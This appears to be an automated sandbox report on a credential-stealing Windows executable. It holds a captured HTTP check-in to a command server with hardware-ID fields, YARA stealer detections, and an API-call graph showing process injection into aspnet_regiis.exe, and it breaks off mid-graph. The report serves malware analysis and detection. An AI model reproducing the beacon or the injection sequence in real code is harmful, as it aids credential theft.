Content-Type: multipart/form-data; boundary=EZMLRP7PI78R7N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1110
Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:17 UTC1110OUTData Raw: 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 39 31 37 45 43 36 41 45 39 46 43 44 39 32 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 5a 4d 4c 52 50 37 50 49 37 38 52 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 0d 0a 2d 2d 45
Data Ascii (multipart body, CRLF line breaks restored from the raw bytes):
--EZMLRP7PI78R7N
Content-Disposition: form-data; name="hwid"

2917EC6AE9FCD922BEBA0C6A975F1733
--EZMLRP7PI78R7N
Content-Disposition: form-data; name="pid"

1
--EZMLRP7PI78R7N
Content-Disposition: form-data; name="lid"

HpOoIh--aadb880da83d
--E
2024-12-27 21:38:19 UTC | 1133 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:38:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=390ddpmq7jtf2usu4elp8ko5ac; expires=Tue, 22 Apr 2025 15:24:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WPpADHTSwGIwbsXvrsnvbIZ9tWxe4e%2FSJS%2Fvo2Bo7%2FbP0jWzsk2twBcB%2F6EeHdGuXCQSqCTjPfiN2yC4Ake7igWJexaKOkxUW9F7uWEF%2F74%2FEHtcMWx3eozFhu9%2BviHePY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f8c74eeeaed0f9d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1559&rtt_var=594&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2022&delivery_rate=1872995&cwnd=193&unsent_bytes=0&cid=8ae01d3f3663ecb5&ts=1755&x=0"
2024-12-27 21:38:19 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size, then chunk body):
f
ok 8.46.123.189
2024-12-27 21:38:19 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk): 0


Target ID: 0
Start time: 16:37:54
Start date: 27/12/2024
Path: C:\Users\user\Desktop\ForcesLangi.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ForcesLangi.exe"
Imagebase: 0x6d0000
File size: 661'504 bytes
MD5 hash: 64F1ABE3F2F65E545C54B23809C06583
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 16:37:54
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 16:37:55
Start date: 27/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase: 0x7e0000
File size: 43'016 bytes
MD5 hash: 5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Execution Graph

Execution Coverage: 11.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.8%
Total number of Nodes: 1016
Total number of Limit Nodes: 7
12053->12054 12061 6ce32c3a EnterCriticalSection 12054->12061 12056 6ce34e21 12070 6ce34e3f 12056->12070 12058 6ce34db5 ___scrt_uninitialize_crt 12058->12056 12062 6ce34d13 12058->12062 12061->12058 12063 6ce34d1f ___scrt_is_nonwritable_in_current_image 12062->12063 12073 6ce350ba EnterCriticalSection 12063->12073 12065 6ce34d29 ___scrt_uninitialize_crt 12066 6ce34d62 12065->12066 12074 6ce34f55 12065->12074 12084 6ce34d93 12066->12084 12112 6ce32c82 LeaveCriticalSection 12070->12112 12072 6ce34e2d 12072->12038 12073->12065 12075 6ce34f62 12074->12075 12076 6ce34f6b 12074->12076 12078 6ce34e4b ___scrt_uninitialize_crt 66 API calls 12075->12078 12087 6ce34ef0 12076->12087 12079 6ce34f68 12078->12079 12079->12066 12082 6ce34f87 12100 6ce36572 12082->12100 12111 6ce350ce LeaveCriticalSection 12084->12111 12086 6ce34d81 12086->12058 12088 6ce34f08 12087->12088 12089 6ce34f2d 12087->12089 12088->12089 12090 6ce35298 ___scrt_uninitialize_crt 25 API calls 12088->12090 12089->12079 12093 6ce35298 12089->12093 12091 6ce34f26 12090->12091 12092 6ce36d6a ___scrt_uninitialize_crt 62 API calls 12091->12092 12092->12089 12094 6ce352a4 12093->12094 12095 6ce352b9 12093->12095 12096 6ce32dcb _free 14 API calls 12094->12096 12095->12082 12097 6ce352a9 12096->12097 12098 6ce315a8 ___std_exception_copy 25 API calls 12097->12098 12099 6ce352b4 12098->12099 12099->12082 12101 6ce36583 12100->12101 12102 6ce36590 12100->12102 12103 6ce32dcb _free 14 API calls 12101->12103 12104 6ce365d9 12102->12104 12106 6ce365b7 12102->12106 12110 6ce36588 12103->12110 12105 6ce32dcb _free 14 API calls 12104->12105 12107 6ce365de 12105->12107 12109 6ce364d0 ___scrt_uninitialize_crt 29 API calls 12106->12109 12108 6ce315a8 ___std_exception_copy 25 API calls 12107->12108 12108->12110 12109->12110 12110->12079 12111->12086 12112->12072 12114 6ce310a6 12113->12114 12116 6ce30cc4 12113->12116 12121 6ce31271 12114->12121 12117 6ce310f3 12116->12117 12118 6ce3111d 12117->12118 12119 6ce310fe 12117->12119 
12118->12042 12120 6ce31108 DeleteCriticalSection 12119->12120 12120->12118 12120->12120 12126 6ce311ed 12121->12126 12124 6ce312a3 TlsFree 12125 6ce31297 12124->12125 12125->12116 12127 6ce31228 12126->12127 12128 6ce31205 12126->12128 12127->12124 12127->12125 12128->12127 12132 6ce31153 12128->12132 12131 6ce3121a GetProcAddress 12131->12127 12138 6ce3115f ___vcrt_InitializeCriticalSectionEx 12132->12138 12133 6ce31175 LoadLibraryExW 12135 6ce31193 GetLastError 12133->12135 12136 6ce311da 12133->12136 12134 6ce311d3 12134->12127 12134->12131 12135->12138 12136->12134 12137 6ce311e2 FreeLibrary 12136->12137 12137->12134 12138->12133 12138->12134 12139 6ce311b5 LoadLibraryExW 12138->12139 12139->12136 12139->12138 12145 6ce323e3 12140->12145 12143 6ce3109c ___vcrt_uninitialize_ptd 6 API calls 12144 6ce2e885 12143->12144 12144->11859 12148 6ce32bdf 12145->12148 12149 6ce32be9 12148->12149 12151 6ce2ed6d 12148->12151 12152 6ce34510 12149->12152 12151->12143 12153 6ce343ef __dosmaperr 5 API calls 12152->12153 12154 6ce3452c 12153->12154 12155 6ce34547 TlsFree 12154->12155 12156 6ce34535 12154->12156 12156->12151 12157->11835 12158 6ce2e684 12159 6ce2e6c2 12158->12159 12160 6ce2e68f 12158->12160 12163 6ce2e7de __DllMainCRTStartup@12 84 API calls 12159->12163 12161 6ce2e6b4 12160->12161 12162 6ce2e694 12160->12162 12170 6ce2e6d7 12161->12170 12164 6ce2e6aa 12162->12164 12165 6ce2e699 12162->12165 12168 6ce2e69e 12163->12168 12189 6ce2ece3 12164->12189 12165->12168 12184 6ce2ed02 12165->12184 12171 6ce2e6e3 ___scrt_is_nonwritable_in_current_image 12170->12171 12197 6ce2ed73 12171->12197 12173 6ce2e6ea __DllMainCRTStartup@12 12174 6ce2e711 12173->12174 12175 6ce2e7d6 12173->12175 12181 6ce2e74d ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12173->12181 12205 6ce2ecd5 12174->12205 12177 6ce2ef12 __DllMainCRTStartup@12 4 API calls 12175->12177 12178 6ce2e7dd 12177->12178 12179 6ce2e720 __RTC_Initialize 12179->12181 12208 6ce2ebf3 InitializeSListHead 
12179->12208 12181->12168 12182 6ce2e72e 12182->12181 12209 6ce2ecaa 12182->12209 12258 6ce323ab 12184->12258 12461 6ce30ca0 12189->12461 12194 6ce2ecff 12194->12168 12195 6ce30cab 21 API calls 12196 6ce2ecec 12195->12196 12196->12168 12198 6ce2ed7c 12197->12198 12213 6ce2f0d8 IsProcessorFeaturePresent 12198->12213 12202 6ce2ed8d 12203 6ce2ed91 12202->12203 12204 6ce30cb6 ___scrt_uninitialize_crt 7 API calls 12202->12204 12203->12173 12204->12203 12252 6ce2edac 12205->12252 12207 6ce2ecdc 12207->12179 12208->12182 12210 6ce2ecaf ___scrt_release_startup_lock 12209->12210 12211 6ce2f0d8 IsProcessorFeaturePresent 12210->12211 12212 6ce2ecb8 12210->12212 12211->12212 12212->12181 12214 6ce2ed88 12213->12214 12215 6ce30c81 12214->12215 12223 6ce310b7 12215->12223 12218 6ce30c8a 12218->12202 12220 6ce30c92 12221 6ce30c9d 12220->12221 12222 6ce310f3 ___vcrt_uninitialize_locks DeleteCriticalSection 12220->12222 12221->12202 12222->12218 12224 6ce310c0 12223->12224 12226 6ce310e9 12224->12226 12227 6ce30c86 12224->12227 12237 6ce31325 12224->12237 12228 6ce310f3 ___vcrt_uninitialize_locks DeleteCriticalSection 12226->12228 12227->12218 12229 6ce31069 12227->12229 12228->12227 12242 6ce31236 12229->12242 12232 6ce3107e 12232->12220 12235 6ce31099 12235->12220 12236 6ce3109c ___vcrt_uninitialize_ptd 6 API calls 12236->12232 12238 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12237->12238 12239 6ce3133f 12238->12239 12240 6ce31348 12239->12240 12241 6ce3135d InitializeCriticalSectionAndSpinCount 12239->12241 12240->12224 12241->12240 12243 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12242->12243 12244 6ce31250 12243->12244 12245 6ce31269 TlsAlloc 12244->12245 12246 6ce31073 12244->12246 12246->12232 12247 6ce312e7 12246->12247 12248 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12247->12248 12249 6ce31301 12248->12249 12250 6ce3108c 12249->12250 12251 6ce3131c TlsSetValue 12249->12251 12250->12235 12250->12236 12251->12250 12253 6ce2edb8 
12252->12253 12254 6ce2edbc 12252->12254 12253->12207 12255 6ce2ef12 __DllMainCRTStartup@12 4 API calls 12254->12255 12257 6ce2edc9 ___scrt_release_startup_lock 12254->12257 12256 6ce2ee32 12255->12256 12257->12207 12264 6ce3297b 12258->12264 12261 6ce30cab 12444 6ce30f93 12261->12444 12265 6ce2ed07 12264->12265 12266 6ce32985 12264->12266 12265->12261 12267 6ce3454f __dosmaperr 6 API calls 12266->12267 12268 6ce3298c 12267->12268 12268->12265 12269 6ce3458e __dosmaperr 6 API calls 12268->12269 12270 6ce3299f 12269->12270 12272 6ce32842 12270->12272 12273 6ce3285d 12272->12273 12274 6ce3284d 12272->12274 12273->12265 12278 6ce32863 12274->12278 12277 6ce32ce7 _free 14 API calls 12277->12273 12279 6ce3287e 12278->12279 12280 6ce32878 12278->12280 12282 6ce32ce7 _free 14 API calls 12279->12282 12281 6ce32ce7 _free 14 API calls 12280->12281 12281->12279 12283 6ce3288a 12282->12283 12284 6ce32ce7 _free 14 API calls 12283->12284 12285 6ce32895 12284->12285 12286 6ce32ce7 _free 14 API calls 12285->12286 12287 6ce328a0 12286->12287 12288 6ce32ce7 _free 14 API calls 12287->12288 12289 6ce328ab 12288->12289 12290 6ce32ce7 _free 14 API calls 12289->12290 12291 6ce328b6 12290->12291 12292 6ce32ce7 _free 14 API calls 12291->12292 12293 6ce328c1 12292->12293 12294 6ce32ce7 _free 14 API calls 12293->12294 12295 6ce328cc 12294->12295 12296 6ce32ce7 _free 14 API calls 12295->12296 12297 6ce328d7 12296->12297 12298 6ce32ce7 _free 14 API calls 12297->12298 12299 6ce328e5 12298->12299 12304 6ce3268f 12299->12304 12305 6ce3269b ___scrt_is_nonwritable_in_current_image 12304->12305 12320 6ce32c3a EnterCriticalSection 12305->12320 12307 6ce326a5 12310 6ce32ce7 _free 14 API calls 12307->12310 12311 6ce326cf 12307->12311 12310->12311 12321 6ce326ee 12311->12321 12312 6ce326fa 12313 6ce32706 ___scrt_is_nonwritable_in_current_image 12312->12313 12325 6ce32c3a EnterCriticalSection 12313->12325 12315 6ce32710 12326 6ce32930 12315->12326 12317 6ce32723 12330 6ce32743 12317->12330 12320->12307 
12324 6ce32c82 LeaveCriticalSection 12321->12324 12323 6ce326dc 12323->12312 12324->12323 12325->12315 12327 6ce32966 __dosmaperr 12326->12327 12328 6ce3293f __dosmaperr 12326->12328 12327->12317 12328->12327 12333 6ce35400 12328->12333 12443 6ce32c82 LeaveCriticalSection 12330->12443 12332 6ce32731 12332->12277 12334 6ce35480 12333->12334 12337 6ce35416 12333->12337 12335 6ce354ce 12334->12335 12338 6ce32ce7 _free 14 API calls 12334->12338 12401 6ce35571 12335->12401 12337->12334 12339 6ce35449 12337->12339 12344 6ce32ce7 _free 14 API calls 12337->12344 12340 6ce354a2 12338->12340 12341 6ce3546b 12339->12341 12349 6ce32ce7 _free 14 API calls 12339->12349 12342 6ce32ce7 _free 14 API calls 12340->12342 12343 6ce32ce7 _free 14 API calls 12341->12343 12345 6ce354b5 12342->12345 12346 6ce35475 12343->12346 12348 6ce3543e 12344->12348 12350 6ce32ce7 _free 14 API calls 12345->12350 12351 6ce32ce7 _free 14 API calls 12346->12351 12347 6ce3553c 12352 6ce32ce7 _free 14 API calls 12347->12352 12361 6ce37337 12348->12361 12355 6ce35460 12349->12355 12356 6ce354c3 12350->12356 12351->12334 12359 6ce35542 12352->12359 12354 6ce32ce7 14 API calls _free 12360 6ce354dc 12354->12360 12389 6ce37435 12355->12389 12358 6ce32ce7 _free 14 API calls 12356->12358 12358->12335 12359->12327 12360->12347 12360->12354 12362 6ce37431 12361->12362 12363 6ce37348 12361->12363 12362->12339 12364 6ce37359 12363->12364 12366 6ce32ce7 _free 14 API calls 12363->12366 12365 6ce3736b 12364->12365 12367 6ce32ce7 _free 14 API calls 12364->12367 12368 6ce3737d 12365->12368 12369 6ce32ce7 _free 14 API calls 12365->12369 12366->12364 12367->12365 12370 6ce3738f 12368->12370 12371 6ce32ce7 _free 14 API calls 12368->12371 12369->12368 12372 6ce373a1 12370->12372 12374 6ce32ce7 _free 14 API calls 12370->12374 12371->12370 12373 6ce373b3 12372->12373 12375 6ce32ce7 _free 14 API calls 12372->12375 12376 6ce373c5 12373->12376 12377 6ce32ce7 _free 14 API calls 12373->12377 12374->12372 12375->12373 12378 6ce373d7 
12376->12378 12379 6ce32ce7 _free 14 API calls 12376->12379 12377->12376 12380 6ce373e9 12378->12380 12382 6ce32ce7 _free 14 API calls 12378->12382 12379->12378 12381 6ce373fb 12380->12381 12383 6ce32ce7 _free 14 API calls 12380->12383 12384 6ce3740d 12381->12384 12385 6ce32ce7 _free 14 API calls 12381->12385 12382->12380 12383->12381 12386 6ce3741f 12384->12386 12387 6ce32ce7 _free 14 API calls 12384->12387 12385->12384 12386->12362 12388 6ce32ce7 _free 14 API calls 12386->12388 12387->12386 12388->12362 12390 6ce37442 12389->12390 12400 6ce3749a 12389->12400 12391 6ce37452 12390->12391 12392 6ce32ce7 _free 14 API calls 12390->12392 12393 6ce32ce7 _free 14 API calls 12391->12393 12395 6ce37464 12391->12395 12392->12391 12393->12395 12394 6ce37476 12397 6ce37488 12394->12397 12398 6ce32ce7 _free 14 API calls 12394->12398 12395->12394 12396 6ce32ce7 _free 14 API calls 12395->12396 12396->12394 12399 6ce32ce7 _free 14 API calls 12397->12399 12397->12400 12398->12397 12399->12400 12400->12341 12402 6ce3559d 12401->12402 12403 6ce3557e 12401->12403 12402->12360 12403->12402 12407 6ce374d6 12403->12407 12406 6ce32ce7 _free 14 API calls 12406->12402 12408 6ce35597 12407->12408 12409 6ce374e7 12407->12409 12408->12406 12410 6ce3749e __dosmaperr 14 API calls 12409->12410 12411 6ce374ef 12410->12411 12412 6ce3749e __dosmaperr 14 API calls 12411->12412 12413 6ce374fa 12412->12413 12414 6ce3749e __dosmaperr 14 API calls 12413->12414 12415 6ce37505 12414->12415 12416 6ce3749e __dosmaperr 14 API calls 12415->12416 12417 6ce37510 12416->12417 12418 6ce3749e __dosmaperr 14 API calls 12417->12418 12419 6ce3751e 12418->12419 12420 6ce32ce7 _free 14 API calls 12419->12420 12421 6ce37529 12420->12421 12422 6ce32ce7 _free 14 API calls 12421->12422 12423 6ce37534 12422->12423 12424 6ce32ce7 _free 14 API calls 12423->12424 12425 6ce3753f 12424->12425 12426 6ce3749e __dosmaperr 14 API calls 12425->12426 12427 6ce3754d 12426->12427 12428 6ce3749e __dosmaperr 14 API calls 12427->12428 
12429 6ce3755b 12428->12429 12430 6ce3749e __dosmaperr 14 API calls 12429->12430 12431 6ce3756c 12430->12431 12432 6ce3749e __dosmaperr 14 API calls 12431->12432 12433 6ce3757a 12432->12433 12434 6ce3749e __dosmaperr 14 API calls 12433->12434 12435 6ce37588 12434->12435 12436 6ce32ce7 _free 14 API calls 12435->12436 12437 6ce37593 12436->12437 12438 6ce32ce7 _free 14 API calls 12437->12438 12439 6ce3759e 12438->12439 12440 6ce32ce7 _free 14 API calls 12439->12440 12441 6ce375a9 12440->12441 12442 6ce32ce7 _free 14 API calls 12441->12442 12442->12408 12443->12332 12445 6ce2ed0c 12444->12445 12447 6ce30fa0 12444->12447 12445->12168 12446 6ce30fae 12449 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12446->12449 12447->12446 12452 6ce312ac 12447->12452 12450 6ce30fbe 12449->12450 12457 6ce30f77 12450->12457 12453 6ce311ed ___vcrt_InitializeCriticalSectionEx 5 API calls 12452->12453 12454 6ce312c6 12453->12454 12455 6ce312de TlsGetValue 12454->12455 12456 6ce312d2 12454->12456 12455->12456 12456->12446 12458 6ce30f81 12457->12458 12460 6ce30f8e 12457->12460 12459 6ce3173e ___vcrt_freefls@4 14 API calls 12458->12459 12458->12460 12459->12460 12460->12445 12467 6ce30fd7 12461->12467 12463 6ce2ece8 12463->12196 12464 6ce323a0 12463->12464 12465 6ce32afe __dosmaperr 14 API calls 12464->12465 12466 6ce2ecf4 12465->12466 12466->12194 12466->12195 12468 6ce30fe3 GetLastError 12467->12468 12469 6ce30fe0 12467->12469 12470 6ce312ac ___vcrt_FlsGetValue 6 API calls 12468->12470 12469->12463 12471 6ce30ff8 12470->12471 12472 6ce3105d SetLastError 12471->12472 12473 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12471->12473 12480 6ce31017 12471->12480 12472->12463 12474 6ce31011 12473->12474 12475 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12474->12475 12477 6ce31039 12474->12477 12474->12480 12475->12477 12476 6ce312e7 ___vcrt_FlsSetValue 6 API calls 12478 6ce3104d 12476->12478 12477->12476 12477->12478 12479 6ce3173e ___vcrt_freefls@4 14 API calls 12478->12479 12479->12480 12480->12472 13110 
6ce3208f 13111 6ce320a1 13110->13111 13112 6ce320a7 13110->13112 13113 6ce3201c 14 API calls 13111->13113 13113->13112 13114 6ce2ed0f 13115 6ce2ed17 ___scrt_release_startup_lock 13114->13115 13118 6ce317cc 13115->13118 13117 6ce2ed3f 13119 6ce317db 13118->13119 13120 6ce317df 13118->13120 13119->13117 13123 6ce317ec 13120->13123 13124 6ce32afe __dosmaperr 14 API calls 13123->13124 13125 6ce317e8 13124->13125 13125->13117 13126 6ce31f4c 13127 6ce31f61 13126->13127 13128 6ce32dde __dosmaperr 14 API calls 13127->13128 13129 6ce31f88 13128->13129 13132 6ce32dde __dosmaperr 14 API calls 13129->13132 13133 6ce31fef 13129->13133 13138 6ce3200f 13129->13138 13139 6ce31fed 13129->13139 13141 6ce32ce7 _free 14 API calls 13129->13141 13143 6ce32431 13129->13143 13130 6ce32ce7 _free 14 API calls 13131 6ce32007 13130->13131 13132->13129 13135 6ce3201c 14 API calls 13133->13135 13136 6ce31ff5 13135->13136 13137 6ce32ce7 _free 14 API calls 13136->13137 13137->13139 13140 6ce315d5 ___std_exception_copy 11 API calls 13138->13140 13139->13130 13142 6ce3201b 13140->13142 13141->13129 13144 6ce3244c 13143->13144 13145 6ce3243e 13143->13145 13146 6ce32dcb _free 14 API calls 13144->13146 13145->13144 13149 6ce32463 13145->13149 13151 6ce32454 13146->13151 13147 6ce315a8 ___std_exception_copy 25 API calls 13148 6ce3245e 13147->13148 13148->13129 13149->13148 13150 6ce32dcb _free 14 API calls 13149->13150 13150->13151 13151->13147 11718 6ce04270 11728 6ce042cf std::bad_exception::bad_exception 11718->11728 11719 6ce0bac1 NtWriteVirtualMemory 11719->11728 11720 6ce09a92 NtWriteVirtualMemory 11720->11728 11721 6ce0b077 CloseHandle 11721->11728 11722 6ce0667b GetConsoleWindow ShowWindow 11759 6cdfd160 11722->11759 11724 6cdfd160 28 API calls 11724->11728 11726 6ce0c5c1 NtCreateThreadEx 11726->11728 11727 6ce0b344 11799 6ce2e610 11727->11799 11728->11719 11728->11720 11728->11721 11728->11722 11728->11724 11728->11726 11728->11727 11731 6ce0b424 GetConsoleWindow ShowWindow 11728->11731 11736 
6ce0848d NtWriteVirtualMemory 11728->11736 11737 6ce0a9ac NtCreateThreadEx 11728->11737 11738 6ce0afd4 CloseHandle 11728->11738 11739 6ce06d5c VirtualAlloc 11728->11739 11740 6ce07ba2 NtWriteVirtualMemory 11728->11740 11741 6ce0c7f3 NtCreateThreadEx 11728->11741 11742 6ce0b954 NtWriteVirtualMemory 11728->11742 11743 6ce07ac1 NtAllocateVirtualMemory 11728->11743 11744 6ce0998d NtReadVirtualMemory 11728->11744 11745 6ce0b55d CreateProcessW 11728->11745 11746 6ce0c16f NtGetContextThread 11728->11746 11747 6ce0c1c1 NtWriteVirtualMemory 11728->11747 11748 6ce0bc8a NtCreateThreadEx 11728->11748 11749 6ce0af30 NtSetContextThread NtResumeThread 11728->11749 11752 6ce073f1 CreateProcessW 11728->11752 11753 6ce0c268 NtWriteVirtualMemory 11728->11753 11754 6ce0a1b4 NtWriteVirtualMemory 11728->11754 11755 6ce0bffe NtSetContextThread NtResumeThread 11728->11755 11756 6ce07e65 NtWriteVirtualMemory 11728->11756 11757 6ce077b2 NtGetContextThread 11728->11757 11758 6ce0c6b4 CloseHandle 11728->11758 11786 6ce02f70 11728->11786 11795 6cdfce50 11728->11795 11730 6ce0b34e 11732 6cdfd160 28 API calls 11731->11732 11735 6ce0b451 11732->11735 11733 6cdfd160 28 API calls 11733->11735 11734 6cdfce50 5 API calls 11734->11735 11735->11728 11735->11733 11735->11734 11736->11728 11737->11728 11738->11728 11739->11728 11740->11728 11741->11728 11742->11728 11743->11728 11744->11728 11745->11728 11746->11728 11747->11728 11748->11728 11749->11728 11752->11728 11753->11728 11754->11728 11755->11728 11756->11728 11757->11728 11758->11728 11783 6cdfd189 ___scrt_uninitialize_crt 11759->11783 11760 6ce003fa CreateFileMappingA 11760->11783 11761 6cdfe8e3 CreateFileMappingA 11761->11783 11762 6ce0067a VirtualProtect 11762->11783 11763 6ce00c89 GetModuleFileNameA 11763->11783 11764 6cdfe5a3 K32GetModuleInformation 11764->11783 11765 6ce00345 GetModuleFileNameA 11765->11783 11766 6cdfecda MapViewOfFile 11766->11783 11767 6cdffe71 CloseHandle CloseHandle 11767->11783 11768 6ce002cc 11769 6ce2e610 
_ValidateLocalCookies 5 API calls 11768->11769 11770 6ce002d6 11769->11770 11770->11728 11771 6cdfe630 GetModuleFileNameA 11771->11783 11772 6cdff637 VirtualProtect 11772->11783 11773 6ce00abe CloseHandle 11773->11783 11774 6cdfe7c7 CreateFileA 11774->11783 11775 6ce0094c CloseHandle 11775->11783 11776 6ce00a43 GetCurrentProcess 11776->11783 11777 6cdfe185 GetCurrentProcess 11777->11783 11778 6cdfe221 ___scrt_uninitialize_crt std::bad_exception::bad_exception 11778->11762 11779 6cdfe250 GetModuleHandleA 11778->11779 11779->11783 11780 6cdffd89 CloseHandle 11780->11783 11781 6ce009e3 CloseHandle CloseHandle 11781->11783 11782 6ce00f92 CloseHandle 11782->11783 11783->11760 11783->11761 11783->11763 11783->11764 11783->11765 11783->11766 11783->11767 11783->11768 11783->11771 11783->11772 11783->11773 11783->11774 11783->11775 11783->11776 11783->11777 11783->11778 11783->11780 11783->11781 11783->11782 11784 6cdff908 VirtualProtect 11783->11784 11785 6cdfec34 CloseHandle 11783->11785 11784->11783 11785->11783 11787 6ce02fc9 11786->11787 11788 6ce035a4 GetModuleHandleW 11787->11788 11791 6ce03ca4 11787->11791 11794 6ce036dd NtQueryInformationProcess 11787->11794 11806 6ce00fc0 11788->11806 11790 6ce035ef std::bad_exception::bad_exception 11790->11787 11792 6ce2e610 _ValidateLocalCookies 5 API calls 11791->11792 11793 6ce03cb4 NtAllocateVirtualMemory 11792->11793 11793->11728 11794->11787 11796 6cdfce76 11795->11796 11797 6ce2e610 _ValidateLocalCookies 5 API calls 11796->11797 11798 6cdfd123 11797->11798 11798->11728 11800 6ce2e618 11799->11800 11801 6ce2e619 IsProcessorFeaturePresent 11799->11801 11800->11730 11803 6ce2ea24 11801->11803 11810 6ce2e9e7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11803->11810 11805 6ce2eb07 11805->11730 11807 6ce01030 11806->11807 11808 6ce2e610 _ValidateLocalCookies 5 API calls 11807->11808 11809 6ce02c5d 11808->11809 11809->11790 11810->11805 12481 6ce0edf0 12485 6ce0ee15 12481->12485 12482 
6ce0f25c 12483 6ce2e610 _ValidateLocalCookies 5 API calls 12482->12483 12484 6ce0f271 12483->12484 12485->12482 12486 6ce2c9c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12485->12486 12486->12485 12487 6ce31bf5 12488 6ce31c0c 12487->12488 12498 6ce31c05 12487->12498 12489 6ce31c2d 12488->12489 12491 6ce31c17 12488->12491 12514 6ce33d28 12489->12514 12493 6ce32dcb _free 14 API calls 12491->12493 12495 6ce31c1c 12493->12495 12511 6ce315a8 12495->12511 12503 6ce31c91 12505 6ce32dcb _free 14 API calls 12503->12505 12504 6ce31c9d 12506 6ce31d2b 37 API calls 12504->12506 12510 6ce31c96 12505->12510 12507 6ce31cb5 12506->12507 12509 6ce32ce7 _free 14 API calls 12507->12509 12507->12510 12508 6ce32ce7 _free 14 API calls 12508->12498 12509->12510 12510->12508 12542 6ce31544 12511->12542 12513 6ce315b4 12513->12498 12515 6ce33d31 12514->12515 12519 6ce31c33 12514->12519 12560 6ce32a64 12515->12560 12520 6ce3376f GetModuleFileNameW 12519->12520 12521 6ce337af 12520->12521 12522 6ce3379e GetLastError 12520->12522 12913 6ce334e8 12521->12913 12908 6ce32d95 12522->12908 12525 6ce337aa 12528 6ce2e610 _ValidateLocalCookies 5 API calls 12525->12528 12529 6ce31c46 12528->12529 12530 6ce31d2b 12529->12530 12532 6ce31d50 12530->12532 12534 6ce31db0 12532->12534 12952 6ce3404e 12532->12952 12533 6ce31c7b 12536 6ce31e9f 12533->12536 12534->12533 12535 6ce3404e 37 API calls 12534->12535 12535->12534 12537 6ce31eb0 12536->12537 12538 6ce31c88 12536->12538 12537->12538 12539 6ce32dde __dosmaperr 14 API calls 12537->12539 12538->12503 12538->12504 12540 6ce31ed9 12539->12540 12541 6ce32ce7 _free 14 API calls 12540->12541 12541->12538 12543 6ce32afe __dosmaperr 14 API calls 12542->12543 12544 6ce3154f 12543->12544 12545 